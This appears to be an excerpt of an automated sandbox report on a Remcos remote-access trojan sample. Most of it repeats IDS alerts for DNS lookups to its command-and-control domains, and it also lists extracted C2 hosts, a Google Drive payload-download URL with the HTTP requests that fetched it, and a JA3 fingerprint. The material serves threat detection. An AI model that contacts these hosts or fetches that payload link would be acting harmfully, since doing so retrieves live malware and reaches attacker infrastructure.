                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:59343 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:58194 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:53547 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:62093 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:61155 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60974 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:50236 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:64562 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:58067 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:65535 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60471 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:57490 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:61257 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:51070 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:57310 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:51083 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:65126 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:53613 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:51046 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:56437 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:51516 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:52810 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052853 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (myumysmeetr .ddns .net) : 192.168.2.4:58098 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63256 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:51596 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:64085 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:53910 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:54616 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51686 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:57528 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:64170 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:56769 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:58691 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:53764 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:64835 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:52245 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:55983 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:60083 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:62933 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:59056 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:63380 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:53097 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63585 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:58645 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63067 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:54580 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56146 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56028 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:61391 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:62782 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:50244 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:52634 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56631 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:63586 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:52231 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:65098 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:49844 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:61809 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:53224 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:49263 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:64192 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51352 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:60693 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51362 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:58629 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:50667 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:49950 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:58377 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56732 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51471 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:64574 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:49395 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:58242 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:57891 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:54755 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:59365 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:64866 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:49957 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:58989 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:55617 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:59617 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:51118 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:58303 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56438 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:54689 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:53292 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60161 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:51254 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63071 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:51115 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:63084 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:54035 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:53983 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60681 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:49533 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:56303 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:63060 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:54360 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:57265 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63348 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:63174 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:52906 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:56622 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:57367 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:57995 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:59915 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:62286 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:52789 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:53101 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:50622 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:58065 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:58396 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:52272 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:52611 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:50105 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:61198 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60726 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:50889 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:60223 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:57578 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:54363 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:52150 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:51942 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:51940 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51822 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:52641 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:50222 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:50624 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:50797 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:49982 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:49702 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:63629 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:65343 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:49990 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:50790 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:51698 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052849 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (meetre1ms .freeddns .org) : 192.168.2.4:63464 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:63627 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:52256 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052851 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (bbhmeetre1ms .freeddns .org) : 192.168.2.4:54466 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2052852 - Severity 1 - ET MALWARE DNS Query to Remcos Related Domain (mysweeterbk .ddns .net) : 192.168.2.4:61632 -> 1.1.1.1:53
                  Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv
                  Source: Malware configuration extractorURLs: tre1ms.freeddns.org
                  Source: Malware configuration extractorURLs: freshmysweeterbk.ddns.net
                  Source: Malware configuration extractorURLs: mysweeterbk.ddns.net
                  Source: Malware configuration extractorURLs: bbhmeetre1ms.freeddns.org
                  Source: Malware configuration extractorURLs: myumysmeetr.ddns.net
                  Source: Malware configuration extractorURLs: meetre1ms.freeddns.org
                  Source: unknownDNS query: name: mysweeterbk.ddns.net
                  Source: unknownDNS query: name: freshmysweeterbk.ddns.net
                  Source: unknownDNS query: name: myumysmeetr.ddns.net
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABE4B8 InternetCheckConnectionA,9_2_02ABE4B8
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.217.19.238:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 142.250.181.33:443
                  Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
                  Source: global trafficHTTP traffic detected: GET /download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
